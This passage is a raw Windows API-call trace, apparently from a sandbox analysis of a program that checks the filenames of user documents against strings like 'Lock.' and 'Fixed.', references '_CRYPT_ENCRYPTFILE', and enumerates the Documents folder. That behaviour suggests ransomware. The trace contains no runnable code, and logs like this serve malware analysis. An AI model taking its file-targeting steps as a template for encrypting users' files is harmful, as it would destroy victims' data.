lpString1="30FxxC-.doc", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0264.118] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0FxxC-.doc", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0264.118] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FxxC-.doc", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0264.118] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xxC-.doc", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0264.118] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xC-.doc", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0264.119] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C-.doc", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0264.119] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-.doc", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0264.119] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0264.119] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0264.119] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0264.119] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0264.119] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0264.119] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0264.119] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0264.119] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0264.119] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0264.200] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0264.200] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0264.200] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0264.200] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0264.200] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0264.200] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0264.200] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0264.200] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0264.200] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0264.200] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0264.200] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0264.201] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0264.201] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0264.201] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0264.201] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0264.201] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0264.201] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0264.201] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0264.201] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1a) returned 0x2e79310 [0264.201] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0264.201] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="J30FxxC-.doc", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0264.201] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="30FxxC-.doc", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0264.201] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0FxxC-.doc", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0264.201] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FxxC-.doc", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0264.201] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xxC-.doc", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0264.201] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xC-.doc", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0264.201] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C-.doc", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0264.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0264.202] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0264.202] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0264.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0264.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0264.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0264.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0264.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0264.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0264.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0264.202] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0264.203] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0264.203] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0264.203] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0264.203] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0264.203] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53920 | out: hHeap=0x970000) returned 1 [0264.203] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0264.203] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0264.203] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0264.203] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55b20 [0264.203] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0264.203] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0264.203] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b20 | out: hHeap=0x970000) returned 1 [0264.203] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0264.203] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0264.203] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54da8 [0264.203] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0264.203] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0264.204] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0264.204] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0264.204] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0264.204] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0264.204] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0264.204] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0264.204] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0264.204] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0264.204] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e54858 [0264.204] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0264.204] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0264.204] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0264.204] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0264.204] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0264.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0264.205] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0264.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0264.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0264.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0264.205] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0264.205] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54d88 [0264.205] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0264.205] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0264.205] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0264.205] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0264.205] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0264.205] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0264.205] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0264.205] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0264.205] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0264.205] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e558d8 [0264.206] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0264.206] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0264.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0264.206] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0264.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0264.206] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0264.206] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0264.206] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0264.206] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0264.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54e18 [0264.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0264.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0264.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0264.206] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0264.206] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54e58 [0264.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516a0 [0264.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0264.207] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0264.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51760 [0264.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0264.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0264.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0264.207] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0264.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0264.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0264.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0264.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0264.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0264.207] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0264.207] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0264.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ca8 [0264.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0264.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0264.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0264.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0264.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0264.208] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0264.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0264.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0264.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0264.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0264.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0264.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0264.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51718 [0264.208] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0264.208] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0264.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0264.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0264.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515c8 [0264.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0264.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0264.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0264.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0264.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0264.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0264.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51700 [0264.209] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0264.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0264.209] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0264.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517f0 [0264.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0264.209] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0264.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0264.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0264.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0264.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0264.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0264.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0264.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0264.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0264.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0264.210] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0264.210] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0264.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517f0 [0264.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0264.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0264.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0264.210] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0264.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0264.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0264.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0264.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51658 [0264.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0264.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0264.211] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0264.211] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0264.211] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0264.211] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0264.211] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0264.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51688 [0264.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0264.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0264.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0264.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0264.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0264.211] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0264.212] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0264.212] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0264.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0264.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0264.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0264.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0264.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0264.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0264.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0264.212] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0264.212] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515c8 [0264.212] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0264.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0264.212] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0264.212] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0264.212] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51688 [0264.212] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0264.212] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0264.212] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0264.212] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0264.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0264.213] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0264.213] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515c8 [0264.213] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0264.213] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0264.213] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0264.213] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0264.213] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0264.213] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0264.213] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0264.213] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0264.213] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0264.213] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0264.213] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517f0 [0264.213] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0264.213] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0264.213] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0264.213] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0264.213] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0264.213] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0264.213] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0264.213] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0264.214] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0264.214] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0264.214] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0264.214] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0264.214] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0264.214] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0264.214] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0264.214] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/J30FxxC-.doc", lpFindFileData=0x8cf170 | out: 